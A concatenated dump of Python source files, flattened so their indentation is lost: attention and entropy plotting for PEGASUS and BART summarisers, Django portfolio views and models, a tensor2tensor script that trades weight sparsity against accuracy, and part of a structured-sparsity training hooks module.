cell_attn = truncate_attention_cell(attn_lle[l][h], input_doc, idf_ban_pos=idf_ban_pos)
all_attns = all_attns + cell_attn
return all_attns
def retrieve_tok_val(cnter, token):
try:
v = cnter[token]
except:
v = 0
return v
import matplotlib
import matplotlib.pyplot as plt
def plot_hist(val_ent_pairs, title):
weights = [p[0] for p in val_ent_pairs]
xs = [p[1] for p in val_ent_pairs]
plt.hist(xs, bins=20, weights=weights, density=True)
plt.xlabel('Pred Ent')
plt.ylabel('Cum Attn')
plt.title(title)
plt.grid(True)
plt.show()
import seaborn as sns
def get_statistics(matrix):
result = [0 for _ in range(len(matrix))]
for idx, row in enumerate(matrix):
try:
m = statistics.mean(row)
except:
m = 0
print("NO DATA!")
result[idx] = m
return result
def proceed_data(segs, val_ent_pairs, step_size=0.5):
cat_bins = [[[] for _ in range(segs)] for _ in range(5)]
for p in val_ent_pairs:
last_inp, cur_inp, cur_pred, next_pred, pred_ent, atte_ent = p
# attn_val, ent, attn_e = p[0], p[1], p[2]
cat = int(pred_ent // step_size)
try:
cat_bins[0][cat].append(last_inp)
cat_bins[1][cat].append(cur_inp)
cat_bins[2][cat].append(cur_pred)
cat_bins[3][cat].append(next_pred)
cat_bins[4][cat].append(atte_ent)
except:
pass
last_inp_mean = get_statistics(cat_bins[0])
cur_inp_mean = get_statistics(cat_bins[1])
cur_pred_mean = get_statistics(cat_bins[2])
next_pred_mean = get_statistics(cat_bins[3])
atte_ent_mean = get_statistics(cat_bins[4])
return last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean, atte_ent_mean
def read_stack_data(last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean, seps=10):
bar0 = last_inp_mean
bar1 = cur_inp_mean
bar2 = cur_pred_mean
bar3 = next_pred_mean
from operator import add
bar01 = np.add(bar0, bar1).tolist()
bar012 = np.add(bar01, bar2).tolist()
# x = list(range(10))
return bar0, bar1, bar2, bar3, bar01, bar012
def plot_single_line(this_fig, spec_config, input_data, step_size=0.5, ent_max=5,
show_x_ticks=False, show_y_ticks=True, data_name="", model_name="", ymin=2, ymax=5):
segs = np.arange(0, ent_max, step_size).tolist()
# colorblind = sns.color_palette("coolwarm", 10)[::-1]
last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean, atte_ent_mean = input_data
axes = this_fig.add_subplot(spec_config)
sns.lineplot(x=list(np.arange(0, 5, step_size)), y=atte_ent_mean, markers=True, dashes=False)
# axes = sns.boxplot(x=x, y=y, palette=colorblind, showfliers=False)
axes.xaxis.set_major_locator(MultipleLocator(1))
axes.xaxis.set_major_formatter(FormatStrFormatter('%d'))
# For the minor ticks, use no labels; default NullFormatter.
axes.xaxis.set_minor_locator(MultipleLocator(0.5))
# axes.get_ylim()
# axes.set_ylim(ymin, ymax)
if show_x_ticks:
# x_vals = [m * step_size for m in xticks]
# axes.set_xticklabels(x_vals, rotation='vertical')center
pass
else:
plt.setp(axes.get_xticklabels(), visible=False)
# if not show_y_ticks:
# plt.setp(axes.get_yticklabels(), visible=False)
if data_name != "":
axes.set_ylabel(data_name)
else:
axes.set_ylabel("")
if model_name != "":
axes.set_title(model_name)
return axes
def plot_single_box(this_fig, spec_config, input_data, step_size=0.5, ent_max=5,
show_x_ticks=False, show_y_ticks=True, ylim=0.8, data_name="", model_name="", show_legend=False):
segs = np.arange(0, ent_max, step_size).tolist()
# colorblind = sns.color_palette("coolwarm", 10)[::-1]
last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean, atte_ent_mean = input_data
bar0, bar1, bar2, bar3, bar01, bar012 = read_stack_data(last_inp_mean, cur_inp_mean, cur_pred_mean, next_pred_mean)
colorblind = sns.color_palette("coolwarm", 4)
# colorblind = sns.color_palette("Set2")
# colorblind = sns.color_palette()
catnames = ['$y_{t-2}$', '$y_{t-1}$',
'$y_{t}$', '$y_{t+1}$']
linewidth = 1.5
axes = this_fig.add_subplot(spec_config)
x = list(np.arange(0, 5, 0.5))
axes.bar(x, bar0, color=colorblind[0],
# edgecolor=colorblind[0],linewidth=linewidth,
label=catnames[0], width=step_size,
# hatch='/'
)
axes.bar(x, bar1, bottom=bar0,
# edgecolor='white', linewidth=1,
label=catnames[1], width=step_size,
# hatch='-',
facecolor=colorblind[1],
# histtype='step', facecolor='g',
# alpha=0.75
# ,hatch='-'
)
axes.bar(x, bar2, bottom=bar01,
# edgecolor=colorblind[3], linewidth=0,
label=catnames[2], width=step_size, facecolor=colorblind[3],
# histtype='step',
# hatch='|'
# ,hatch='|'
)
axes.bar(x, bar3, bottom=bar012, color=colorblind[2], label=catnames[3], width=step_size,
# edgecolor=colorblind[2], linewidth=linewidth,
# hatch='\\'
)
# axes = sns.boxplot(x=x, y=y, palette=colorblind, showfliers=False)
axes.xaxis.set_major_locator(MultipleLocator(1))
axes.xaxis.set_major_formatter(FormatStrFormatter('%d'))
if show_legend:
axes.legend(ncol=2, frameon=False)
# For the minor ticks, use no labels; default NullFormatter.
axes.xaxis.set_minor_locator(MultipleLocator(0.5))
axes.set_ylim(0, ylim)
if show_x_ticks:
# x_vals = [m * step_size for m in xticks]
# axes.set_xticklabels(x_vals, rotation='vertical')center
pass
else:
plt.setp(axes.get_xticklabels(), visible=False)
if not show_y_ticks:
plt.setp(axes.get_yticklabels(), visible=False)
if data_name != "":
axes.set_ylabel(data_name)
else:
axes.set_ylabel("")
if model_name != "":
axes.set_title(model_name)
return axes
def plot_box(val_ent_pairs, title=None, step_size=.25):
# max_pred_ent = max([p[1] for p in val_ent_pairs])
# segs = np.linspace(0, max_pred_ent + 0.1, num=20).tolist()
segs = np.arange(0, 8, step_size).tolist()
colorblind = sns.color_palette("coolwarm", 10)[::-1]
bins = [[] for _ in range(len(segs))]
x, y = [], []
for p in val_ent_pairs:
v, ent = p[0], p[1]
cat = int(ent // step_size)
try:
bins[cat].append(v)
x.append(cat)
y.append(v)
except:
pass
fig1, ax1 = plt.subplots()
ax1.set_title(title)
ax1 = sns.violinplot(x=x, y=y, cut=0, palette=colorblind, inner='quartile')
# ax1.set_xticks( np.arange(0, 8, step_size).tolist())
# ax1.set_xticklabels(np.arange(0, 8, step_size).tolist())
return ax1
def plot_single_scatter(val_ent_pairs, title):
y_attn_frac = [m[0] for m in val_ent_pairs]
x_pred_ent = [m[1] for m in val_ent_pairs]
ax = sns.jointplot(x=x_pred_ent, y=y_attn_frac, kind="hex", color="#4CB391")
# ax = sns.scatterplot(x=x_pred_ent,y=y_attn_frac)
#
# sns.histplot(x=x_pred_ent, y=y_attn_frac, bins=50, pthresh=.1, cmap="mako")
# sns.kdeplot(x=x_pred_ent, y=y_attn_frac, levels=5,linewidths=1)
# ax.set_title(title)
plt.show()
return ax
def analyze_attention_y_entropy(max_time_step, attn_tlle, pred_distribution, input_doc, ban_positions, logits, nuc,
top_p):
# T = attn_tlle.shape[0]
# data_pairs = [[], [], [], []]
data = []
for t in range(max_time_step):
try:
t_pred_ent = comp_entropy(pred_distribution[t], nuc, top_p)
last_inp, cur_inp, cur_pred, next_pred = get_ys(t, logits)
all_attns_counter = _y_entropy_step(attn_tlle[t], input_doc, ban_positions)
total_attn_val = sum(all_attns_counter.values())
all_attention = list(all_attns_counter.values())
np_attn = np.asarray(all_attention) / total_attn_val
attn_ent = comp_entropy(np_attn)
last_inp_val = retrieve_tok_val(all_attns_counter, last_inp)
cur_inp_val = retrieve_tok_val(all_attns_counter, cur_inp)
cur_pred_val = retrieve_tok_val(all_attns_counter, cur_pred)
next_pred_val = retrieve_tok_val(all_attns_counter, next_pred)
# data_pairs[0].append((last_inp_val / total_attn_val, t_pred_ent))
# data_pairs[1].append((cur_inp_val / total_attn_val, t_pred_ent))
# data_pairs[2].append((cur_pred_val / total_attn_val, t_pred_ent))
data.append((last_inp_val / total_attn_val, cur_inp_val / total_attn_val,
cur_pred_val / total_attn_val, next_pred_val / total_attn_val,
t_pred_ent, attn_ent))
except:
pass
# data_pairs[3].append((next_pred_val / total_attn_val, t_pred_ent))
return data
import pickle
import numpy as np
from scipy.stats import entropy
import matplotlib.gridspec as gridspec
import multiprocessing
def detect_useless_ids(indices):
last = -100
good_indices = []
for x in indices:
if x - 5 > last:
last = x
good_indices.append(x)
else:
break
return good_indices
def process_data_single(args, f, eos_token_ids):
print("running")
BOS_TOKEN = 0
with open(os.path.join(args.cur_dir, f), 'rb') as fd:
data = pickle.load(fd)
attentions, pred_distb, logits, input_doc = data['attentions'], data['pred_distributions'], data['logits'], \
data['input_doc']
timesteps = len(attentions)
attentions_tlle = convert_enc_attn(attentions, merge_layer_head=False) # T,L,L,E
attention_tle = convert_enc_attn(attentions, merge_layer_head=True) # T,L,E
document_len = input_doc.shape[0]
input_doc = input_doc.astype(np.int).tolist()
logits = logits.tolist()
indices = [i for i, x in enumerate(logits) if x in eos_token_ids]
good_indices = detect_useless_ids(indices)
if good_indices:
max_t = good_indices[-1]
else:
max_t = attentions_tlle.shape[0]
# dec_inp_logits = [BOS_TOKEN] + logits[:-1]
pred_distb = np.exp(pred_distb) # time step, vocab size
# pred_ent = entropy(pred_distb, axis=-1)
idf_flag = compute_idf(attention_tle[:max_t]) # E
ban_positions = get_ban_positions(idf_flag)
# ban_positions = []
data_pairs = analyze_attention_y_entropy(max_t, attentions_tlle, pred_distb, input_doc, ban_positions, logits,
args.nucleus, args.nuc_prob)
return data_pairs
from itertools import product
def plot_stack_vocab(cnndm_peg, xsum_peg, cnndm_bart, xsum_bart):
fig = plt.figure(figsize=(FIG_SIZE_x, FIG_SIZE_x - 4))
spec2 = gridspec.GridSpec(ncols=2, nrows=2, figure=fig)
plot_single_box(this_fig=fig, spec_config=spec2[0, 0], input_data=cnndm_peg, show_x_ticks=False,
show_y_ticks=True, data_name="CNN/DM", model_name="PEGASUS", ylim=0.7)
plot_single_box(this_fig=fig, spec_config=spec2[0, 1], input_data=cnndm_bart, show_x_ticks=False,
show_y_ticks=False, model_name="BART", ylim=0.7)
plot_single_box(this_fig=fig, spec_config=spec2[1, 0], input_data=xsum_peg, show_x_ticks=True, show_y_ticks=True,
data_name='XSum', ylim=0.4)
plot_single_box(this_fig=fig, spec_config=spec2[1, 1], input_data=xsum_bart, show_x_ticks=True,
show_y_ticks=False, ylim=0.4, show_legend=True)
fig.text(0.5, 0.01, 'Prediction Entropy', ha='center', fontsize=font_size)
fig.text(0.0, 0.5, 'Vocab Projected Attention', va='center', rotation='vertical', fontsize=font_size)
fig.tight_layout()
plt.savefig(f"x_pred_ent_y_attn_frac.pdf", dpi=dpi, bbox_inches='tight')
plt.show()
plt.close()
def run_one_fig(spec, args, num_samples=300):
print(f"--{spec}--")
CUR_DIR = os.path.join(args.prob_meta_dir, spec)
args.cur_dir = CUR_DIR
files = os.listdir(CUR_DIR)
random.shuffle(files)
files = files[:num_samples]
BOS_TOKEN = 0
print(args.spec_name)
if 'pegasus' in args.model_name:
from transformers import PegasusTokenizer
bpe_tokenizer = PegasusTokenizer.from_pretrained(args.model_name)
EOS_TOK_IDs = [106, bpe_tokenizer.eos_token_id, 2] # <n>
elif 'gpt' in args.model_name:
from transformers import GPT2Tokenizer
bpe_tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
EOS_TOK_IDs = [bpe_tokenizer.eos_token_id]
elif 'bart' in args.model_name:
from transformers import BartTokenizer
bpe_tokenizer = BartTokenizer.from_pretrained(args.model_name)
EOS_TOK_IDs = [bpe_tokenizer.eos_token_id]
else:
raise NotImplementedError
# process_data_single(args, files[0], eos_token_ids=EOS_TOK_IDs)
len_samples = len(files)
cpu_cnt = multiprocessing.cpu_count()
with multiprocessing.Pool(processes=cpu_cnt) as pool:
results = pool.starmap(process_data_single, zip([args] * len_samples, files, [EOS_TOK_IDs] * len_samples))
output = list(itertools.chain.from_iterable(results))
print(f"Samples: {len(output)}")
output = proceed_data(10, output)
return output
def plot_ant_entropy(cnndm_peg, xsum_peg, cnndm_bart, xsum_bart):
fig = plt.figure(figsize=(FIG_SIZE_x, FIG_SIZE_x - 5))
step_size = 0.5
d = {'PEG$_{C}$': cnndm_peg[-1],
'PEG-X': xsum_peg[-1],
'BART-C': cnndm_bart[-1],
'BART-X': xsum_bart[-1],
}
# df = pd.DataFrame(data=d)
ax = fig.add_subplot(1, 1, 1)
# line1 = sns.lineplot(x=list(np.arange(0, 5, step_size)), y=cnndm_peg[-1], label='PEG$_{C}$', markers='x')
plt.plot(list(np.arange(0, 5, step_size)), cnndm_peg[-1], label='PEG$_{C}$', marker='+',
# color='k'
)
plt.plot(list(np.arange(0, 5, step_size)), xsum_peg[-1], label='PEG$_{X}$', marker='x',
# color='k'
)
plt.plot(list(np.arange(0, 5, step_size)), cnndm_bart[-1], label='BART$_{C}$', ls='--', marker='+',
# color='k'
)
plt.plot(list(np.arange(0, 5, step_size)), xsum_bart[-1], label='BART$_{X}$', ls='--', marker='x',
# color='k'
)
plt.legend(loc='best', ncol=2, frameon=False)
# spec2 = gridspec.GridSpec(ncols=2, nrows=2, figure=fig)
# plot_single_line(this_fig=fig, spec_config=spec2[0, 0], input_data=cnndm_peg, show_x_ticks=False,
# show_y_ticks=True, data_name="CNN/DM", model_name="PEGASUS", ymin=2, ymax=4
# )
# plot_single_line(this_fig=fig, spec_config=spec2[0, 1], input_data=cnndm_bart, show_x_ticks=False,
# show_y_ticks=False, model_name="BART", ymin=2, ymax=4)
# plot_single_line(this_fig=fig, spec_config=spec2[1, 0], input_data=xsum_peg, show_x_ticks=True, show_y_ticks=True,
# data_name='XSUM', ymin=2.5, ymax=4)
# plot_single_line(this_fig=fig, spec_config=spec2[1, 1], input_data=xsum_bart, show_x_ticks=True,
# show_y_ticks=False, ymin=2.5, ymax=4)
ax.set_ylabel('Attention Entropy')
ax.set_xlabel('Prediction Entropy')
ax.xaxis.set_major_locator(MultipleLocator(0.5))
# ax.xaxis.set_major_formatter(FormatStrFormatter('%d'))
# For the minor ticks, use no labels; default NullFormatter.
# plt.xaxis.set_minor_locator(MultipleLocator(0.5))
fig.tight_layout()
plt.savefig(f"atten_entropy.pdf", dpi=dpi, bbox_inches='tight')
# fig.text(0.5, 0.01, 'Prediction Entropy', ha='center')
# fig.text(0.0, 0.5, '', va='center', rotation='vertical')
plt.show()
plt.close()
import pandas as pd
if __name__ == '__main__':
args = parse_arg()
print("Looking at attention")
if 'pegasus' in args.model_name:
from transformers import PegasusTokenizer
bpe_tokenizer = PegasusTokenizer.from_pretrained(args.model_name)
EOS_TOK_IDs = [106, bpe_tokenizer.eos_token_id] # <n>
BOS_TOK_ID = 0
else:
raise NotImplementedError
cnndm_peg = "d_cnn_dailymail-m_googlepegasuscnn_dailymail-full1"
xsum_peg = "d_xsum-m_googlepegasusxsum-full1"
cnndm_bart = "d_cnn_dailymail-m_facebookbartlargecnn-full1"
xsum_bart = 'd_xsum-m_facebookbartlargexsum-full1'
xsum_bart_out = run_one_fig(xsum_bart, args)
cnndm_peg_out = run_one_fig(cnndm_peg, args)
xsum_peg_out = run_one_fig(xsum_peg, args)
cnndm_bart_out = run_one_fig(cnndm_bart, args)
# df = pd.DataFrame(data=xsum_bart_out)
# plot_stack_vocab(cnndm_peg_out, xsum_peg_out, cnndm_bart_out, xsum_bart_out)
plot_stack_vocab(cnndm_peg_out, xsum_peg_out, cnndm_bart_out, xsum_bart_out)
plot_ant_entropy(cnndm_peg_out, xsum_peg_out, cnndm_bart_out, xsum_bart_out)
# plot_box(all_data_pairs[0], 'last_inp')
# plot_box(all_data_pairs[1], 'cur_inp')
# plot_box(all_data_pairs[2], 'cur_pred')
# plot_box(all_data_pairs[3], 'next_pred')
``` |
{
"source": "jiachengzhang1/portfolio-web",
"score": 2
} |
#### File: portfolio-web/portfolio_web/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.conf import settings
from .models import WebsiteInfo
from .models import Project
from .models import Experience
from .models import Education
months = ["Jan", "Feb", "Mar", "Apr", "May", "June",
"July", "Aug", "Sept", "Oct", "Nov", "Dec"]
default_context = {'analyticsId': settings.GOOGLE_ANALYTICS_ID}
def home(request):
return render(request, 'portfolio_web/pages/home.html', {})
def project(request):
website_info = WebsiteInfo.objects.first()
projects = []
for project in Project.objects.order_by('priority'):
projects.append({
'date': months[project.date.month-1] + ", " + str(project.date.year),
'title': project.title,
'subtitle': project.subtitle,
'content': project.content,
'image': project.image,
'demoURL': project.demoURL,
'codeURL': project.codeURL,
'technologies': [{'name': v.name, 'link': v.link} for v in project.technologies.all()]
})
context = merge_context(default_context, {
'projects': projects,
"page_title": "Project",
'header_paragraph': website_info.portfolioPageHeader if website_info != None else '',
'header': 'PROJECT' if len(projects) == 1 else 'PROJECTS'
})
return render(request, 'portfolio_web/pages/project.html', context)
def experience(request):
website_info = WebsiteInfo.objects.first()
experiences = []
for experience in Experience.objects.order_by('priority'):
start = experience.startDate
end = experience.endDate
period = ""
if start != None and end != None:
period += months[start.month - 1] + " " + str(start.year)
period += " –– "
period += months[end.month - 1] + " " + str(end.year)
elif start == None and end != None:
period += months[end.month - 1] + " " + str(end.year)
elif start != None and end == None:
period += months[start.month - 1] + " " + str(start.year)
period += " –– "
period += "Present"
location = (experience.city + ", " + experience.state)
experiences.append({
'image': experience.image,
'title': experience.title,
'content': experience.content,
'position': experience.position,
'date': period,
'location': location
})
context = merge_context(default_context, {
"experiences":experiences,
"page_title": "Experience",
'header_paragraph': website_info.experiencePageHeader if website_info != None else '',
'header': 'EXPERIENCE' if len(experiences) == 1 else 'EXPERIENCES'
})
return render(request, 'portfolio_web/pages/experience.html', context)
def education(request):
website_info = WebsiteInfo.objects.first()
educations = []
for education in Education.objects.order_by('priority'):
start = education.startDate
end = education.endDate
period = ""
if start != None and end != None:
period += months[start.month - 1] + " " + str(start.year)
period += " –– "
period += months[end.month - 1] + " " + str(end.year)
elif start == None and end != None:
period += months[end.month - 1] + " " + str(end.year)
elif start != None and end == None:
period += months[start.month - 1] + " " + str(start.year)
period += " –– "
period += "Present"
educations.append({
'degree': education.degree,
'content': education.content,
'institution': education.institution,
'city': education.city,
'state': education.state,
'period': period
})
context = merge_context(default_context, {
"educations": educations,
"page_title": "Education",
'header_paragraph': website_info.educationPageHeader if website_info != None else '',
'header': 'EDUCATION' if len(educations) == 1 else 'EDUCATIONS'
})
return render(request, 'portfolio_web/pages/education.html', context)
def contact(request):
website_info = WebsiteInfo.objects.first()
context = merge_context(default_context, {
"page_title": "Contact Me",
'header_paragraph': website_info.contactPageHeader if website_info != None else '',
'header': 'CONTACT ME'
})
return render(request, 'portfolio_web/pages/contact.html', context)
def merge_context(c1, c2):
context = {}
context.update(c1)
context.update(c2)
return context
``` |
{
"source": "JiachengZheng/LearnDjango",
"score": 2
} |
#### File: apiproject/api/models.py
```python
from django.db import models
class Category(models.Model):
name = models.CharField(max_length=100)
url = models.CharField(max_length=200)
def __str__(self):
return self.name
class Article(models.Model):
title = models.CharField(max_length=200)
date = models.CharField(max_length=50)
url = models.CharField(max_length=200)
category = models.ForeignKey(Category)
def __str__(self):
return self.title
``` |
{
"source": "JiachenMao/TransfornerPrune",
"score": 2
} |
#### File: tensor2tensor/bin/t2t_wei_feat_distrib.py
```python
r"""Prune T2TModels using some heuristic.
This code demonstrates the magnitude distribution of weight and feature map.
Additionally, with the sparsity of weight increases, how accuracy drops
Target:
if the feature map (hidden state) is very sparse in nature,
may be we can directly apply spars matrix multiplation to accelerate the model
Example run:
- train a resnet on cifar10:
bin/t2t_trainer.py --problem=image_cifar10 --hparams_set=resnet_cifar_32 \
--model=resnet
- evaluate different pruning percentages using weight-level pruning:
bin/t2t_prune.py --pruning_params_set=resnet_weight --problem=image_cifar10\
--hparams_set=resnet_cifar_32 --model=resnet
"""
import os
from tensor2tensor.bin import t2t_trainer
from tensor2tensor.data_generators import problem as problem_lib # pylint: disable=unused-import
from tensor2tensor.visualization import wei_feat_distrib
from tensor2tensor.utils import registry
from tensor2tensor.utils import t2t_model
from tensor2tensor.utils import trainer_lib
from tensor2tensor.utils import usr_dir
from tensor2tensor.utils import bleu_hook
import tensorflow as tf
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # so the IDs match nvidia-smi
# os.environ["CUDA_VISIBLE_DEVICES"] = "1" # "0, 1" for multiple
flags = tf.flags
FLAGS = flags.FLAGS
# See flags.py for additional command-line flags.
flags.DEFINE_string("pruning_params_set", None,
"Which pruning parameters to use.")
flags.DEFINE_string("log_dir", '',
"log directory.")
# def initialize_from_ckpt(ckpt_dir):
# tf.logging.info("Checkpoint dir: %s", ckpt_dir)
# reader = tf.contrib.framework.load_checkpoint(ckpt_dir)
# variable_map = {}
# for var in tf.contrib.framework.get_trainable_variables():
# var_name = var.name.split(":")[0]
# if reader.has_tensor(var_name):
# tf.logging.info("Loading variable from checkpoint: %s", var_name)
# variable_map[var_name] = var
# else:
# tf.logging.info("Cannot find variable in checkpoint, skipping: %s",
# var_name)
# tf.train.init_from_checkpoint(ckpt_dir, variable_map)
def create_pruning_params():
return registry.pruning_params(FLAGS.pruning_params_set)
def create_pruning_strategy(name):
return registry.pruning_strategy(name)
'''
get the evaluation graph for image classification
'''
def get_eval_graph_image(EstimatorSpec, labels):
preds = EstimatorSpec.predictions["predictions"]
preds = tf.argmax(preds, -1, output_type=labels.dtype)
acc, acc_update_op = tf.metrics.accuracy(labels=labels, predictions=preds)
return acc, acc_update_op
# '''
# get the evaluation graph for translation problem
# '''
# def get_eval_graph_trans(EstimatorSpec, labels):
# preds = EstimatorSpec.predictions["predictions"]
# # outputs = tf.to_int32(tf.argmax(preds, axis=-1))
# outputs = tf.to_int32(tf.argmax(preds, axis=-1))
# # Convert the outputs and labels to a [batch_size, input_length] tensor.
# outputs = tf.squeeze(outputs, axis=[-1, -2])
# labels = tf.squeeze(labels, axis=[-1, -2])
# # bleu, constant = bleu_hook.bleu_score(predictions=preds, labels=labels)
# return outputs, labels, preds
'''
get the evaluation graph for translation problem
'''
def get_eval_graph_trans(EstimatorSpec, labels):
preds = EstimatorSpec.predictions["predictions"]
# outputs = tf.to_int32(tf.argmax(preds, axis=-1))
# outputs = tf.to_int32(tf.argmax(preds, axis=-1))
# # Convert the outputs and labels to a [batch_size, input_length] tensor.
# outputs = tf.squeeze(outputs, axis=[-1, -2])
# labels = tf.squeeze(labels, axis=[-1, -2])
bleu, constant = bleu_hook.bleu_score(predictions=preds, labels=labels)
return bleu
def main(argv):
tf.logging.set_verbosity(tf.logging.INFO)
trainer_lib.set_random_seed(FLAGS.random_seed)
usr_dir.import_usr_dir(FLAGS.t2t_usr_dir)
t2t_trainer.maybe_log_registry_and_exit()
if FLAGS.generate_data:
t2t_trainer.generate_data()
if argv:
t2t_trainer.set_hparams_from_args(argv[1:])
# hparams = t2t_trainer.create_hparams()
# hparams.add_hparam("data_dir", FLAGS.data_dir)
# trainer_lib.add_problem_hparams(hparams, FLAGS.problem)
hparams_path = os.path.join(FLAGS.output_dir, "hparams.json")
hparams = trainer_lib.create_hparams(
FLAGS.hparams_set, FLAGS.hparams, data_dir=FLAGS.data_dir,
problem_name=FLAGS.problem, hparams_path=hparams_path)
hparams.add_hparam("model_dir", FLAGS.output_dir)
config = t2t_trainer.create_run_config(hparams)
params = {"batch_size": hparams.batch_size}
# add "_rev" as a hack to avoid image standardization
problem = registry.problem(FLAGS.problem)
input_fn = problem.make_estimator_input_fn(tf.estimator.ModeKeys.EVAL,
hparams)
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=False))
model_fn = t2t_model.T2TModel.make_estimator_model_fn(
FLAGS.model, hparams, use_tpu=False)
dataset = input_fn(params, config).repeat()
dataset_iteraor = dataset.make_one_shot_iterator()
features, labels = dataset_iteraor.get_next()
# tf.logging.info("### t2t_wei_feat_distrib.py features %s", features)
spec = model_fn(
features,
labels,
tf.estimator.ModeKeys.EVAL,
params=hparams,
config=config)
# get the summary model structure graph
summary_writer = tf.summary.FileWriter(FLAGS.log_dir, sess.graph)
# Restore weights
saver = tf.train.Saver()
checkpoint_path = os.path.expanduser(FLAGS.output_dir or
FLAGS.checkpoint_path)
tf.logging.info("### t2t_wei_feat_distrib.py checkpoint_path %s", checkpoint_path)
# saver.restore(sess, tf.train.latest_checkpoint(checkpoint_path))
# Load weights from checkpoint.
ckpts = tf.train.get_checkpoint_state(checkpoint_path)
ckpt = ckpts.model_checkpoint_path
saver.restore(sess, ckpt)
# saver.restore(sess, checkpoint_path+'/model.ckpt-1421000')
# initialize_from_ckpt(checkpoint_path)
# get parameter
pruning_params = create_pruning_params()
pruning_strategy = create_pruning_strategy(pruning_params.strategy)
# get evalutaion graph
if 'image' in FLAGS.problem:
acc, acc_update_op = get_eval_graph_image(spec, labels)
tf.summary.scalar('accuracy', acc)
# define evaluation function
def eval_model():
sess.run(tf.initialize_local_variables())
for _ in range(FLAGS.eval_steps):
acc = sess.run(acc_update_op)
return acc
elif 'translate' in FLAGS.problem:
bleu_op = get_eval_graph_trans(spec, labels)
# tf.summary.scalar('bleu', bleu_op)
# define evaluation function
def eval_model():
bleu_value = 0
# sess.run(tf.initialize_local_variables())
# sess.run()
# local_vars = tf.local_variables()
# tf.logging.info("###!!!!!!! t2t_wei_feat_distrib.py local_vars %s", local_vars)
# for _ in range(FLAGS.eval_steps):
for _ in range(FLAGS.eval_steps):
# outputs_tensor, labels_tensor, preds_tensor = sess.run([outputs, labels, preds])
bleu = sess.run(bleu_op)
# tf.logging.info("### t2t_wei_feat_distrib.py outputs_tensor %s", outputs_tensor[0].shape)
# tf.logging.info("### t2t_wei_feat_distrib.py labels_tensor %s", labels_tensor[0].shape)
# tf.logging.info("### t2t_wei_feat_distrib.py preds %s", preds_tensor[0].shape)
bleu_value += bleu
bleu_value /= FLAGS.eval_steps
return bleu_value
# get weight distribution graph
wei_feat_distrib.get_weight_distrib_graph(pruning_params)
# do accuracy sparsity tradeoff for model weights
wei_feat_distrib.wei_sparsity_acc_tradeoff(sess, eval_model, pruning_strategy, pruning_params, summary_writer)
# do accuracy sparsity tradeoff for model weights
# save the summary
summary_writer.close()
sess.run(tf.initialize_local_variables())
preds = spec.predictions["predictions"]
# features_shape=tf.shape(features)
pred_shape=tf.shape(preds)
labels_shape=tf.shape(labels)
# tf.logging.info("###---- t2t_wei_feat_distrib.py feature preds %s", features)
# tf.logging.info("###---- t2t_wei_feat_distrib.py shape preds %s", sess.run([pred_shape, labels_shape]))
# tf.logging.info("###---- t2t_wei_feat_distrib.py shape labels_shape %s", sess.run(labels_shape))
# print weight distribution to terminal
# wei_feat_distrib.print_weight_distrib(sess, pruning_params)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
```
#### File: tensor2tensor/utils/ssl_hooks.py
```python
import tensorflow as tf
import pickle
'''
define all the hooks for structure sparsity training
(1) SSLEvalHook:
SSLEvalHook is only used during the SSL training step with Group Lasso regularization.
SSLEvalHook is executed during evaluation, which zerouts
weights by small threshold to stablize the sparsity
(2) SSLFinetuneHook:
SSLFinetuneHook is only used during the SSL finetune step to restore the accuracy.
For a complete SSL training procedure, a pretrained model should first do SSL training, then do SSL fine tuning:
pretrained model -> [SSL training] -> [SSL fine tuning] -> final model
'''
'''
decide what layer to prune by defined white list and black list
'''
def should_prune_v1(w, white_list, black_list):
in_whitelist = not self.white_list or any(
e in w.name for e in white_list)
in_blacklist = any(e in w.name for e in black_list)
if white_list and not in_whitelist:
return False
elif in_blacklist:
return False
return True
'''
decide what layer to prune by dimension:
(1): only remain fc layer
(2): discard embedding layer
'''
def should_prune_v2(w, dim=2):
dims = w.get_shape().as_list()
num_dims = len(dims)
if num_dims == dim and 'body' in w.op.name and 'target_space_embedding' not in w.op.name and 'symbol_modality_' not in w.op.name:
return True
return False
def fill_sparisity_summary(sparsity_summary, sparisty, layer_name, layer_dim):
if 'body' not in layer_name:
sparsity_summary[layer_name] = sparisty
else:
sub_names = layer_name.split('/')
assert(len(sub_names)>1)
layer_idx = codec = sub_block_dim = sub_block_idx = None
for n in sub_names:
n = str(n)
if n.startswith('layer_'):
layer_idx = 1+int(n.split('_')[-1])
elif n.startswith('_sub_block'):
token = n.split('_')
sub_block_dim = (int(token[5]), int(token[8]))
sub_block_idx = (int(token[4]), int(token[7]))
elif n=='encoder':
codec = n
elif n=='decoder':
codec = n
tf.logging.info("%s", layer_name)
tf.logging.info("%s %s %s %s", layer_idx, codec, sub_block_dim, sub_block_idx)
assert(layer_idx and codec and sub_block_dim and sub_block_idx)
if 'q' in sub_names:
layer_summary = sparsity_summary['multihead_attention']['q'][codec]
if codec=='decoder' and 'encdec_attention' in sub_names:
layer_summary = layer_summary['encdec_atten']
elif codec=='decoder' and 'self_attention' in sub_names:
layer_summary = layer_summary['self_atten']
elif 'k' in sub_names:
layer_summary = sparsity_summary['multihead_attention']['k'][codec]
if codec=='decoder' and 'encdec_attention' in sub_names:
layer_summary = layer_summary['encdec_atten']
elif codec=='decoder' and 'self_attention' in sub_names:
layer_summary = layer_summary['self_atten']
elif 'v' in sub_names:
layer_summary = sparsity_summary['multihead_attention']['v'][codec]
if codec=='decoder' and 'encdec_attention' in sub_names:
layer_summary = layer_summary['encdec_atten']
elif codec=='decoder' and 'self_attention' in sub_names:
layer_summary = layer_summary['self_atten']
elif 'output_transform' in sub_names:
layer_summary = sparsity_summary['multihead_attention']['output_transform'][codec]
if codec=='decoder' and 'encdec_attention' in sub_names:
layer_summary = layer_summary['encdec_atten']
elif codec=='decoder' and 'self_attention' in sub_names:
layer_summary = layer_summary['self_atten']
elif 'ffn' in sub_names and 'conv1' in sub_names:
layer_summary = sparsity_summary['ffn_1'][codec]
elif 'ffn' in sub_names and 'conv2' in sub_names:
layer_summary = sparsity_summary['ffn_2'][codec]
if layer_idx not in layer_summary:
